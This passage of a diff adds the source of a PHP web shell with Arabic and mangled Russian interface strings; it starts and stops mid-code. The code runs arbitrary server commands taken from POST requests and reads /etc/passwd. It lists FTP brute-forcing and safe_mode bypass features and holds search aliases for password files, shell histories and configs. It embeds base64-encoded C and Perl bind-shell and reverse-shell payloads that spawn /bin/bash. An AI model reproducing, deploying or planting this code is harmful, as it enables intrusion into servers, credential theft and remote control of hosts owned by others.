/bin/bash', +'ru_text10'=>'??????? ????', +'ru_text11'=>'?????? ??? ???????', +'ru_butt3' =>'???????', +'ru_text12'=>'back-connect', +'ru_text13'=>'IP-?????', +'ru_text14'=>'????', +'ru_butt4' =>'?????????', +'ru_text15'=>'???????? ?????? ? ?????????? ???????', +'ru_text16'=>'????????????', +'ru_text17'=>'????????? ????', +'ru_text18'=>'????????? ????', +'ru_text19'=>'Exploits', +'ru_text20'=>'????????????', +'ru_text21'=>'????? ???', +'ru_text22'=>'datapipe', +'ru_text23'=>'????????? ????', +'ru_text24'=>'????????? ????', +'ru_text25'=>'????????? ????', +'ru_text26'=>'????????????', +'ru_butt5' =>'?????????', +'ru_text28'=>'?????? ? safe_mode', +'ru_text29'=>'?????? ????????', +'ru_butt6' =>'???????', +'ru_text30'=>'???????? ?????', +'ru_butt7' =>'???????', +'ru_text31'=>'???? ?? ??????', +'ru_text32'=>'?????????? PHP ????', +'ru_text33'=>'???????? ??????????? ?????? ??????????? open_basedir ????? ??????? cURL', +'ru_butt8' =>'?????????', +'ru_text34'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ??????? include', +'ru_text35'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ???????? ????? ? mysql', +'ru_text36'=>'???? . ???????', +'ru_text37'=>'?????', +'ru_text38'=>'??????', +'ru_text39'=>'????', +'ru_text40'=>'???? ??????? ???? ??????', +'ru_butt9' =>'????', +'ru_text41'=>'????????? ? ?????', +'ru_text42'=>'?????????????? ?????', +'ru_text43'=>'????????????? ????', +'ru_butt10'=>'?????????', +'ru_butt11'=>'?????????????', +'ru_text44'=>'?????????????? ????? ??????????! ?????? ?????? ??? ??????!', +'ru_text45'=>'???? ????????', +'ru_text46'=>'???????? phpinfo()', +'ru_text47'=>'???????? ???????? php.ini', +'ru_text48'=>'???????? ????????? ??????', +'ru_text49'=>'???????? ??????? ? ???????', +'ru_text50'=>'?????????? ? ??????????', +'ru_text51'=>'?????????? ? ??????', +'ru_text52'=>'????? ??? ??????', +'ru_text53'=>'?????? ? ?????', +'ru_text54'=>'????? ?????? ? ??????', +'ru_butt12'=>'?????', +'ru_text55'=>'?????? ? 
??????', +'ru_text56'=>'?????? ?? ???????', +'ru_text57'=>'???????/??????? ????/??????????', +'ru_text58'=>'???', +'ru_text59'=>'????', +'ru_text60'=>'??????????', +'ru_butt13'=>'???????/???????', +'ru_text61'=>'???? ??????', +'ru_text62'=>'?????????? ???????', +'ru_text63'=>'???? ??????', +'ru_text64'=>'?????????? ???????', +'ru_text65'=>'???????', +'ru_text66'=>'???????', +'ru_text67'=>'Chown/Chgrp/Chmod', +'ru_text68'=>'???????', +'ru_text69'=>'????????1', +'ru_text70'=>'????????2', +'ru_text71'=>"?????? ???????? ???????:\r\n- ??? CHOWN - ??? ?????? ???????????? ??? ??? UID (??????) \r\n- ??? ??????? CHGRP - ??? ?????? ??? GID (??????) \r\n- ??? ??????? CHMOD - ????? ????? ? ???????????? ????????????? (???????? 0777)", +'ru_text72'=>'????? ??? ??????', +'ru_text73'=>'?????? ? ?????', +'ru_text74'=>'?????? ? ??????', +'ru_text75'=>'* ????? ???????????? ?????????? ?????????', +'ru_text76'=>'????? ?????? ? ?????? ? ??????? ??????? find', +'ru_text80'=>'???', +'ru_text81'=>'????', +'ru_text82'=>'???? ??????', +'ru_text83'=>'?????????? SQL ???????', +'ru_text84'=>'SQL ??????', +'ru_text85'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ?????????? ?????? ? MSSQL ???????', +'ru_text86'=>'?????????? ????? ? ???????', +'ru_butt14'=>'???????', +'ru_text87'=>'?????????? ?????? ? ?????????? ftp-???????', +'ru_text88'=>'FTP-??????:????', +'ru_text89'=>'???? ?? ftp ???????', +'ru_text90'=>'????? ????????', +'ru_text91'=>'???????????? ?', +'ru_text92'=>'??? ?????????', +'ru_text93'=>'FTP', +'ru_text94'=>'FTP-????????', +'ru_text95'=>'?????? ?????????????', +'ru_text96'=>'?? ??????? ???????? ?????? ?????????????', +'ru_text97'=>'????????? ??????????: ', +'ru_text98'=>'??????? ???????????: ', +'ru_text99'=>'* ? ???????? ?????? ? ?????? ???????????? ??? ???????????? ?? /etc/passwd', +'ru_text100'=>'???????? ?????? ?? ????????? ??? ??????', +'ru_text101'=>'???????????? ????? ???????????? (user -> resu) ??? ???????????? ? ???????? 
??????', +'ru_text102'=>'?????', +'ru_text103'=>'???????? ??????', +'ru_text104'=>'???????? ????? ?? ???????? ????', +'ru_text105'=>'????', +'ru_text106'=>'??', +'ru_text107'=>'????', +'ru_butt15'=>'?????????', +'ru_text108'=>'????? ??????', +'ru_text109'=>'????????', +'ru_text110'=>'??????????', +'ru_text111'=>'SQL-?????? : ????', +'ru_text112'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ????????????? ??????? mb_send_mail', +'ru_text113'=>'???????? ??????????? ?????? ??????????? safe_mode, ???????? ???????? ?????????? ? ?????????????? imap_list', +'ru_text114'=>'???????? ??????????? ?????? ??????????? safe_mode, ???????? ??????????? ????? ? ?????????????? imap_body', +/* --------------------------------------------------------------- */ +'eng_text1' =>'الأمر المطبق', +'eng_text2' =>'تنفيذ أوامر على السيرفر', +'eng_text3' =>'تطبيق أمر معين', +'eng_text4' =>'منطقة العمل', +'eng_text5' =>'رفع ملف إلى السيرفر', +'eng_text6' =>'الملف المراد رفعه', +'eng_text7' =>'ملفات مشهورة (يعني أهم الملفات إلي تحتاجها)هه', +'eng_text8' =>'إختر الملف', +'eng_butt1' =>'تنفيذ', +'eng_butt2' =>'رفع', +'eng_text9' =>'فتح بورت على السيرفر/bin/bash', +'eng_text10'=>'البورت', +'eng_text11'=>'باسورد الوصول', +'eng_butt3' =>'فتح', +'eng_text12'=>'إتصال عكسي', +'eng_text13'=>'IP', +'eng_text14'=>'البورت', +'eng_butt4' =>'إتصال', +'eng_text15'=>'تحميل ملف من موقع خارجي', +'eng_text16'=>'مع', +'eng_text17'=>'عنوان الملف', +'eng_text18'=>'الملف على السيرفر', +'eng_text19'=>'الإستغلال', +'eng_text20'=>'إستخدام', +'eng_text21'=>'&nbsp;إسم جديد', +'eng_text22'=>'datapipe', +'eng_text23'=>'المنفذ المحلي', +'eng_text24'=>'سيرفر بعيد', +'eng_text25'=>'Remote port', +'eng_text26'=>'إستخدام', +'eng_butt5' =>'تشغيل', +'eng_text28'=>'العمل في الوضع الآمن', +'eng_text29'=>'لم يتم الوصول', +'eng_butt6' =>'تغير', +'eng_text30'=>'عرض ملف', +'eng_butt7' =>'إظهار', +'eng_text31'=>'الملف غير موجود', +'eng_text32'=>'الكود الخبيث', +'eng_text33'=>'Test bypass open_basedir with cURL functions', 
+'eng_butt8' =>'إختبار', +'eng_text34'=>'Test bypass safe_mode with include function', +'eng_text35'=>'Test bypass safe_mode with load file in mysql', +'eng_text36'=>'القاعدة', +'eng_text37'=>'اليوزر', +'eng_text38'=>'الباسورد', +'eng_text39'=>'جدول', +'eng_text40'=>'أخذ نسخه من قواعد البيانات', +'eng_butt9' =>'أخذ نسخه', +'eng_text41'=>'أخذ نسخه إلى ملف', +'eng_text42'=>'تحرير ملف', +'eng_text43'=>'الملف المراد تحريره', +'eng_butt10'=>'تخزين', +'eng_text44'=>'لا تستطيع تحرير الملف ,فقد تستطيع القرائة', +'eng_text45'=>'تخزين ملف', +'eng_text46'=>'phpinfo() إظهار معلومات الــ', +'eng_text47'=>'php.ini عرض المتغيرات من', +'eng_text48'=>'مسح ملفات التبت', +'eng_butt11'=>'تحرير ملف', +'eng_text49'=>'مسح الشل من السيرفر', +'eng_text50'=>'cpuعرض معلومات', +'eng_text51'=>'عرض حجم الذاكرة', +'eng_text52'=>'بحث عن نص', +'eng_text53'=>'في المجلدات', +'eng_text54'=>'إبحث عن نص في ملف', +'eng_butt12'=>'بحث', +'eng_text55'=>'فقط في الملفات', +'eng_text56'=>'لا شيء):', +'eng_text57'=>'تكوين/مسح ملف/مجلد', +'eng_text58'=>'الإسم', +'eng_text59'=>'الملف', +'eng_text60'=>'المجلد', +'eng_butt13'=>'إنشاء/حذف', +'eng_text61'=>'ملف أنشئ', +'eng_text62'=>'مجلد أنشئ', +'eng_text63'=>'الملف حذف', +'eng_text64'=>'المجلد حذف', +'eng_text65'=>'إنشاء', +'eng_text66'=>'حذف', +'eng_text67'=>'Chown/Chgrp/Chmod', +'eng_text68'=>'أمر', +'eng_text69'=>'param1', +'eng_text70'=>'param2', +'eng_text71'=>"Second commands param is:\r\n- for CHOWN - name of new owner or UID\r\n- for CHGRP - group name or GID\r\n- for CHMOD - 0777, 0755...", +'eng_text72'=>'مستند للبحث', +'eng_text73'=>'بحث في المجلدات', +'eng_text74'=>'بحث في الملفات', +'eng_text75'=>'* regexp تستطيع إستدام', +'eng_text76'=>'البحث عن نص في الملفات عن طريق الأمر بحث', +'eng_text77'=>'إظهار تركيبة قاعدة البيانات', +'eng_text78'=>'إظهار الجداول', +'eng_text79'=>'إظهار الأعمدة', +'eng_text80'=>'النوع', +'eng_text81'=>'الشبكة', +'eng_text82'=>'قواعد البيانات', +'eng_text83'=>'SQLشغل إستعلامات الــ ', +'eng_text84'=>'SQLإستعلامات الــ', 
+'eng_text85'=>'Test bypass safe_mode with commands execute via MSSQL server', +'eng_text86'=>'تنزيل ملفات من السيرفر', +'eng_butt14'=>'تنزيل', +'eng_text87'=>'FTP-serverتنزيل ملف من ', +'eng_text88'=>'FTP-server:port', +'eng_text89'=>'FTPالملف على', +'eng_text90'=>'Transfer mode', +'eng_text91'=>'Archivation', +'eng_text92'=>'without archivation', +'eng_text93'=>'FTP', +'eng_text94'=>'FTP-bruteforce', +'eng_text95'=>'قائمة الأعضاء', +'eng_text96'=>'Can\'t get users list', +'eng_text97'=>'checked: ', +'eng_text98'=>'success: ', +'eng_text99'=>'* use username from /etc/passwd for ftp login and password', +'eng_text100'=>'FTP-serverإرسال ملف إلى', +'eng_text101'=>'Use reverse (user -> resu) login for password', +'eng_text102'=>'البريد', +'eng_text103'=>'إرسل رسالة بريد إلكتروني', +'eng_text104'=>'إرسال ملف إلى بريد إلكتروني', +'eng_text105'=>'إلى', +'eng_text106'=>'من', +'eng_text107'=>'العنوان', +'eng_butt15'=>'إرسال', +'eng_text108'=>'البريد', +'eng_text109'=>'إخفاء', +'eng_text110'=>'إظهار', +'eng_text111'=>'SQL-Server : Port', +'eng_text112'=>'Test bypass safe_mode with function mb_send_mail', +'eng_text113'=>'Test bypass safe_mode, view dir list via imap_list', +'eng_text114'=>'Test bypass safe_mode, view file contest via imap_body', +); +/* +?????? ?????? +????????? ???????? ????????????? ?????? ????? ? ???-?? ??????. ( ??????? ????????? ???? ????????? ???? ) +?? ?????? ???? ????????? ??? ???????? ???????. +*/ +$aliases=array( +'find suid files'=>'find / -type f -perm -04000 -ls', +'find suid files in current dir'=>'find . -type f -perm -04000 -ls', +'find sgid files'=>'find / -type f -perm -02000 -ls', +'find sgid files in current dir'=>'find . -type f -perm -02000 -ls', +'find config.inc.php files'=>'find / -type f -name config.inc.php', +'find config.inc.php files in current dir'=>'find . -type f -name config.inc.php', +'find config* files'=>'find / -type f -name "config*"', +'find config* files in current dir'=>'find . 
-type f -name "config*"',
+'find all writable files'=>'find / -type f -perm -2 -ls',
+'find all writable files in current dir'=>'find . -type f -perm -2 -ls',
+'find all writable directories'=>'find / -type d -perm -2 -ls',
+'find all writable directories in current dir'=>'find . -type d -perm -2 -ls',
+'find all writable directories and files'=>'find / -perm -2 -ls',
+'find all writable directories and files in current dir'=>'find . -perm -2 -ls',
+'find all service.pwd files'=>'find / -type f -name service.pwd',
+'find service.pwd files in current dir'=>'find . -type f -name service.pwd',
+'find all .htpasswd files'=>'find / -type f -name .htpasswd',
+'find .htpasswd files in current dir'=>'find . -type f -name .htpasswd',
+'find all .bash_history files'=>'find / -type f -name .bash_history',
+'find .bash_history files in current dir'=>'find . -type f -name .bash_history',
+'find all .mysql_history files'=>'find / -type f -name .mysql_history',
+'find .mysql_history files in current dir'=>'find . -type f -name .mysql_history',
+'find all .fetchmailrc files'=>'find / -type f -name .fetchmailrc',
+'find .fetchmailrc files in current dir'=>'find . 
-type f -name .fetchmailrc',
+'list file attributes on a Linux second extended file system'=>'lsattr -va',
+'show opened ports'=>'netstat -an | grep -i listen',
+'----------------------------------------------------------------------------------------------------'=>'ls -la'
+);
+$table_up1 = "<tr><td bgcolor=#cccccc><font face=Verdana size=2><b><div align=center>:: ";
+$table_up2 = " ::</div></b></font></td></tr><tr><td>";
+$table_up3 = "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc>";
+$table_end1 = "</td></tr>";
+$arrow = " <font face=Wingdings color=gray>?</font>";
+$lb = "<font color=black>[</font>";
+$rb = "<font color=black>]</font>";
+$font = "<font face=Verdana size=2>";
+$ts = "<table class=table1 width=100% align=center>";
+$te = "</table>";
+$fs = "<form name=form method=POST>";
+$fe = "</form>";
+
+if(isset($_GET['users']))
+ {
+ if(!$users=get_users()) { echo "<center><font face=Verdana size=2 color=red>".$lang[$language.'_text96']."</font></center>"; }
+ else
+ {
+ echo '<center>';
+ foreach($users as $user) { echo $user."<br>"; }
+ echo '</center>';
+ }
+ echo "<br><div align=center><font face=Verdana size=2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die();
+ }
+
+if (!empty($_POST['dir'])) { @chdir($_POST['dir']); }
+$dir = @getcwd();
+$windows = 0;
+$unix = 0;
+if(strlen($dir)>1 && $dir[1]==":") $windows=1; else $unix=1;
+if(empty($dir))
+ {
+ $os = getenv('OS');
+ if(empty($os)){ $os = php_uname(); }
+ if(empty($os)){ $os ="-"; $unix=1; }
+ else
+ {
+ if(@eregi("^win",$os)) { $windows = 1; }
+ else { $unix = 1; }
+ }
+ }
+if(!empty($_POST['s_dir']) && !empty($_POST['s_text']) && !empty($_POST['cmd']) && $_POST['cmd'] == "search_text")
+ {
+ echo $head;
+ if(!empty($_POST['s_mask']) && !empty($_POST['m'])) { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text'],$_POST['s_mask']); }
+ else { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text']); }
+ $sr->SearchText(0,0);
+ $res = 
$sr->GetResultFiles(); + $found = $sr->GetMatchesCount(); + $titles = $sr->GetTitles(); + $r = ""; + if($found > 0) + { + $r .= "<TABLE width=100%>"; + foreach($res as $file=>$v) + { + $r .= "<TR>"; + $r .= "<TD colspan=2><font face=Verdana size=2><b>".ws(3); + $r .= ($windows)? str_replace("/","\\",$file) : $file; + $r .= "</b></font></ TD>"; + $r .= "</TR>"; + foreach($v as $a=>$b) + { + $r .= "<TR>"; + $r .= "<TD align=center><B><font face=Verdana size=2>".$a."</font></B></TD>"; + $r .= "<TD><font face=Verdana size=2>".ws(2).$b."</font></TD>"; + $r .= "</TR>\n"; + } + } + $r .= "</TABLE>"; + echo $r; + } + else + { + echo "<P align=center><B><font face=Verdana size=2>".$lang[$language.'_text56']."</B></font></P>"; + } + echo "<br><div align=center><font face=Verdana size=2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; + die(); + } +if(strpos(ex("echo abcr57"),"r57")!=3) { $safe_mode = 1; } +$SERVER_SOFTWARE = getenv('SERVER_SOFTWARE'); +if(empty($SERVER_SOFTWARE)){ $SERVER_SOFTWARE = "-"; } +function ws($i) +{ +return @str_repeat("&nbsp;",$i); +} +function ex($cfe) +{ + $res = ''; + if (!empty($cfe)) + { + if(function_exists('exec')) + { + @exec($cfe,$res); + $res = join("\n",$res); + } + elseif(function_exists('shell_exec')) + { + $res = @shell_exec($cfe); + } + elseif(function_exists('system')) + { + @ob_start(); + @system($cfe); + $res = @ob_get_contents(); + @ob_end_clean(); + } + elseif(function_exists('passthru')) + { + @ob_start(); + @passthru($cfe); + $res = @ob_get_contents(); + @ob_end_clean(); + } + elseif(@is_resource($f = @popen($cfe,"r"))) + { + $res = ""; + while(!@feof($f)) { $res .= @fread($f,1024); } + @pclose($f); + } + } + return $res; +} +function get_users() +{ + $users = array(); + $rows=file('/etc/passwd'); + if(!$rows) return 0; + foreach ($rows as $string) + { + $user = @explode(":",$string); + if(substr($string,0,1)!='#') array_push($users,$user[0]); + } + return $users; +} +function we($i) +{ 
+if($GLOBALS['language']=="ru"){ $text = '??????! ?? ???? ???????? ? ???? '; } +else { $text = "[-] ERROR! Can't write in file "; } +echo "<table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#cccccc><font color=red face=Verdana size=2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>"; +return null; +} +function re($i) +{ +if($GLOBALS['language']=="ru"){ $text = '??????! ?? ???? ????????? ???? '; } +else { $text = "[-] ERROR! Can't read file "; } +echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>"; +return null; +} +function ce($i) +{ +if($GLOBALS['language']=="ru"){ $text = "?? ??????? ??????? "; } +else { $text = "Can't create "; } +echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>"; +return null; +} +function fe($l,$n) +{ +$text['ru'] = array('?? ??????? ???????????? ? ftp ???????','?????? ??????????? ?? ftp ???????','?? ??????? ???????? ?????????? ?? ftp ???????'); +$text['eng'] = array('Connect to ftp server failed','Login to ftp server failed','Can\'t change dir on ftp server'); +echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=2><div align=center><b>".$text[$l][$n]."</b></div></font></td></tr></table>"; +return null; +} +function mr($l,$n) +{ +$text['ru'] = array('?? ??????? ????????? ??????','?????? 
??????????'); +$text['eng'] = array('Can\'t send mail','Mail sent'); +echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=2><div align=center><b>".$text[$l][$n]."</b></div></font></td></tr></table>"; +return null; +} +function perms($mode) +{ +if ($GLOBALS['windows']) return 0; +if( $mode & 0x1000 ) { $type='p'; } +else if( $mode & 0x2000 ) { $type='c'; } +else if( $mode & 0x4000 ) { $type='d'; } +else if( $mode & 0x6000 ) { $type='b'; } +else if( $mode & 0x8000 ) { $type='-'; } +else if( $mode & 0xA000 ) { $type='l'; } +else if( $mode & 0xC000 ) { $type='s'; } +else $type='u'; +$owner["read"] = ($mode & 00400) ? 'r' : '-'; +$owner["write"] = ($mode & 00200) ? 'w' : '-'; +$owner["execute"] = ($mode & 00100) ? 'x' : '-'; +$group["read"] = ($mode & 00040) ? 'r' : '-'; +$group["write"] = ($mode & 00020) ? 'w' : '-'; +$group["execute"] = ($mode & 00010) ? 'x' : '-'; +$world["read"] = ($mode & 00004) ? 'r' : '-'; +$world["write"] = ($mode & 00002) ? 'w' : '-'; +$world["execute"] = ($mode & 00001) ? 'x' : '-'; +if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S'; +if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S'; +if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T'; +$s=sprintf("%1s", $type); +$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']); +$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']); +$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']); +return trim($s); +} +function in($type,$name,$size,$value) +{ + $ret = "<input type=".$type." name=".$name." "; + if($size != 0) { $ret .= "size=".$size." 
"; } + $ret .= "value=\"".$value."\">"; + return $ret; +} +function which($pr) +{ +$path = ex("which $pr"); +if(!empty($path)) { return $path; } else { return $pr; } +} +function cf($fname,$text) +{ + $w_file=@fopen($fname,"w") or we($fname); + if($w_file) + { + @fputs($w_file,@base64_decode($text)); + @fclose($w_file); + } +} +function sr($l,$t1,$t2) + { + return "<tr class=tr1><td class=td1 width=".$l."% align=right>".$t1."</td><td class=td1 align=left>".$t2."</td></tr>"; + } +if (!@function_exists("view_size")) +{ +function view_size($size) +{ + if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";} + elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";} + elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";} + else {$size = $size . " B";} + return $size; +} +} + function DirFilesR($dir,$types='') + { + $files = Array(); + if(($handle = @opendir($dir))) + { + while (false !== ($file = @readdir($handle))) + { + if ($file != "." 
&& $file != "..") + { + if(@is_dir($dir."/".$file)) + $files = @array_merge($files,DirFilesR($dir."/".$file,$types)); + else + { + $pos = @strrpos($file,"."); + $ext = @substr($file,$pos,@strlen($file)-$pos); + if($types) + { + if(@in_array($ext,explode(';',$types))) + $files[] = $dir."/".$file; + } + else + $files[] = $dir."/".$file; + } + } + } + @closedir($handle); + } + return $files; + } + class SearchResult + { + var $text; + var $FilesToSearch; + var $ResultFiles; + var $FilesTotal; + var $MatchesCount; + var $FileMatschesCount; + var $TimeStart; + var $TimeTotal; + var $titles; + function SearchResult($dir,$text,$filter='') + { + $dirs = @explode(";",$dir); + $this->FilesToSearch = Array(); + for($a=0;$a<count($dirs);$a++) + $this->FilesToSearch = @array_merge($this->FilesToSearch,DirFilesR($dirs[$a],$filter)); + $this->text = $text; + $this->FilesTotal = @count($this->FilesToSearch); + $this->TimeStart = getmicrotime(); + $this->MatchesCount = 0; + $this->ResultFiles = Array(); + $this->FileMatchesCount = Array(); + $this->titles = Array(); + } + function GetFilesTotal() { return $this->FilesTotal; } + function GetTitles() { return $this->titles; } + function GetTimeTotal() { return $this->TimeTotal; } + function GetMatchesCount() { return $this->MatchesCount; } + function GetFileMatchesCount() { return $this->FileMatchesCount; } + function GetResultFiles() { return $this->ResultFiles; } + function SearchText($phrase=0,$case=0) { + $qq = @explode(' ',$this->text); + $delim = '|'; + if($phrase) + foreach($qq as $k=>$v) + $qq[$k] = '\b'.$v.'\b'; + $words = '('.@implode($delim,$qq).')'; + $pattern = "/".$words."/"; + if(!$case) + $pattern .= 'i'; + foreach($this->FilesToSearch as $k=>$filename) + { + $this->FileMatchesCount[$filename] = 0; + $FileStrings = @file($filename) or @next; + for($a=0;$a<@count($FileStrings);$a++) + { + $count = 0; + $CurString = $FileStrings[$a]; + $CurString = @Trim($CurString); + $CurString = @strip_tags($CurString); + $aa = ''; + 
if(($count = @preg_match_all($pattern,$CurString,$aa))) + { + $CurString = @preg_replace($pattern,"<SPAN style='color: #990000;'><b>\\1</b></SPAN>",$CurString); + $this->ResultFiles[$filename][$a+1] = $CurString; + $this->MatchesCount += $count; + $this->FileMatchesCount[$filename] += $count; + } + } + } + $this->TimeTotal = @round(getmicrotime() - $this->TimeStart,4); + } + } + function getmicrotime() + { + list($usec,$sec) = @explode(" ",@microtime()); + return ((float)$usec + (float)$sec); + } +$port_bind_bd_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS +A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I +GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt +b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9 +pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF +NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK +ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog +ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk +7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2 +9tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld +2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu +dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp +lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0="; 
+$port_bind_bd_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS +VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs +JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV +TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG +lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK +Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i +Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N +lIENPTk47DQpleGl0IDA7DQp9DQp9"; +$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj +aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR +hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT +sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI +kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi +KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl +OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; +$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC +BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb +SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd 
